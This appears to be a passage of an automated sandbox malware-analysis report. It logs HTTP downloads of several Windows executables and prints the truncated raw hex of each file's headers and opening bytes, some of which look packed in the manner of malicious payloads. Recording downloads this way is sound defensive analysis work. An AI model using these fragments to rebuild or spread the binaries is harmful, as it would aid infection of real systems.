00 00 4c 01 05 00 15 64 5d 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 56 86 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 63 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 63 01 00 00 40 0d 00 00 64 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 58 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:56:22 GMTContent-Type: application/octet-streamContent-Length: 1806336Last-Modified: Sat, 14 Dec 2024 10:56:44 GMTConnection: keep-aliveETag: "675d646c-1b9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 10 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 69 00 00 04 00 00 42 f5 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 6b 6e 62 6c 62 69 78 00 f0 19 00 00 10 4f 00 00 ec 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 79 6f 65 67 6c 75 69 00 10 00 00 00 00 69 00 00 04 00 00 00 6a 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 69 00 00 22 00 00 00 6e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:56:30 GMTContent-Type: application/octet-streamContent-Length: 2794496Last-Modified: Sat, 14 Dec 2024 10:55:53 GMTConnection: keep-aliveETag: "675d6439-2aa400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 c6 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 74 69 74 6d 75 63 7a 63 00 60 2a 00 00 a0 00 00 00 44 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 73 6c 73 75 63 70 6e 00 20 00 00 00 00 2b 00 00 04 00 00 00 7e 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 82 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:56:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:56:41 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:56:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:56:54 GMTContent-Type: application/octet-streamContent-Length: 727552Last-Modified: Wed, 11 Dec 2024 08:22:24 GMTConnection: keep-aliveETag: "67594bc0-b1a00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 41 4d 01 00 00 10 00 00 00 4e 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 3c 7e 00 00 00 60 01 00 00 80 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 1c 00 00 00 e0 01 00 00 12 00 00 00 d6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 00 00 00 00 00 02 00 00 02 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 80 13 00 00 00 10 02 00 00 14 00 00 00 ea 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 8e 04 00 00 30 02 00 00 8e 04 00 00 fe 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 8e 04 00 00 c0 06 00 00 8e 04 00 00 8c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 11:56:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 